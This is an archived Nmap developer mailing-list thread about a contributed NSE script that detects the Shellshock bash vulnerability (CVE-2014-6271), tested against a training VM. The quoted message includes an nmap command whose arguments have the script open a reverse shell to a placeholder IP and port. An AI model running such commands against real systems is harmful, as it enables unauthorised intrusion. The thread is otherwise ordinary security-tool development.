Nmap Development mailing list archives
Re: Shell Shock NSE Script (CVE-2014-6271)
From: Paulino Calderon <paulino () calderonpale com>
Date: Wed, 1 Oct 2014 03:11:25 -0500
Hello everyone, I’ve cleaned up the script and improved a few things: https://bitbucket.org/cldrn/nmap-nse-scripts/src/111b0a2439b22cb287572f5b45fd7991814ec6cf/scripts/6.x/http-shellshock.nse?at=master I’ve tested the script against the VM and it works perfectly. Obviously more testing is appreciated but i think it is ready for submission. Cheers. On Sep 26, 2014, at 3:45 AM, Paul Amar <paul () sensepost com> wrote:
Hi list, I created a NSE script for the Shell Shock vulnerability (CVE-2014-6271). I tested the script with Pentesterlab's VM located here: files.pentesterlab.com/cve-2014-6271/cve-2014-6271.iso. This script detects if the host is vulnerable. If so, you get a reverse shell by specifying the good arguments. Eg. ./nmap -p80 --script http-vuln-cve-2014-6271.nse --script-args http-vuln-cve-2014-6271.remoteIp=<your-ip>,http-vuln-cve-2014-6271.remotePort=<your-port>,http-vuln-cve-2014-6271.uri=/cgi-bin/status <ip> -d Feel free if you have any feedback, Paul <http-vuln-cve-2014-6271.nse>_______________________________________________ Sent through the dev mailing list http://nmap.org/mailman/listinfo/dev Archived at http://seclists.org/nmap-dev/
_______________________________________________ Sent through the dev mailing list http://nmap.org/mailman/listinfo/dev Archived at http://seclists.org/nmap-dev/
Current thread:
- Re: Shell Shock NSE Script (CVE-2014-6271) Paulino Calderon (Oct 01)
- Re: Shell Shock NSE Script (CVE-2014-6271) Richard Miles (Oct 02)
- Re: Shell Shock NSE Script (CVE-2014-6271) Paulino Calderon (Oct 09)
- Re: Shell Shock NSE Script (CVE-2014-6271) Richard Miles (Oct 09)
- Re: Shell Shock NSE Script (CVE-2014-6271) stripes (Oct 09)
- Re: Shell Shock NSE Script (CVE-2014-6271) Shritam Bhowmick (Oct 11)
- Re: Shell Shock NSE Script (CVE-2014-6271) Paulino Calderon (Oct 09)
- Re: Shell Shock NSE Script (CVE-2014-6271) Richard Miles (Oct 14)
- Re: Shell Shock NSE Script (CVE-2014-6271) Paulino Calderon (Dec 01)
- Re: Shell Shock NSE Script (CVE-2014-6271) Richard Miles (Oct 02)